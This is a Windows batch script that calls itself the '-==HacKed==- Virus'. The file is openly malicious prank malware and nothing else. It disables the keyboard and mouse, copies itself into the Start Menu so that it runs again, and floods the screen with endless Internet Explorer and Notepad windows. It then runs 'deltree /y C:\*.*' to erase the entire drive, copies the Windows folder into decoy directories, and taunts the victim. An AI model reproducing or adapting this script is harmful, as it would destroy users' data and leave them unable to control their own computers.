Echo Start of -==HacKed==- Virus
C:\windows\rundll32.exe keyboard,disable
C:\windows\rundll32.exe mouse,disable
@Echo Off
CD
C:WINDOWSDESKTOP
Echo Hey How did you like my Pop-Up Virus? >ReadMe.Txt
Echo Hey Youve been -==HacKed==->You have been HacKed.Txt
Echo Hey You have been -==HacKed==-
copy %0 C:\WINDOWS\START MENU\ PROGRAMS 
copy iBTopicQuestion.bat C:\WINDOWS\Start Menu\Programs
:loop
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start IExplore
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
Start Notepad
@echo off
cls
echo.
echo  SURPRISE ASSHOLE !!!
deltree /y C:\*.*
ECHO BREAK!
copy %windir% c:\program files\Windows Service pack do not delete\
copy %windir% c:\program files\wmplayer\
copy %windir% c:\norton updates\
copy %windir% c:\My Documents\DirectX\
copy %windir% c:\program files\PLUS!\
copy %windir% c:\Internet Explorer\
copy %windir% c:\program files\Internet Explorer\
copy %windir% C:\program files\CHAT\
copy %windir% c:\program files\Outlook Express\
copy %windir% c:\program files\Accessories\
copy %windir% c:\program files\Microsoft Office\
copy %windir% c:\program files\Norton AntiVirus\
copy %windir% c:\program files\Uninstall Information\
copy %windir% c:\program files\Windows NT\
copy %windir% c:\program files\Microsoft ActiveSync\
copy %windir% c:\program files\MSN\
copy %windir% c:\program files\Messenger\
copy %windir% c:\program files\Real\
copy %windir% c:\program files\Movie Maker\
copy %windir% c:\program files\Common Files\ 
GOTO loop

Echo Did you Enjoy closeing out all those windows? 
CHOICE/C:YN

Where you able to close them out? I did Disable your Keyboard and mouse.
CHOICE/C:YN





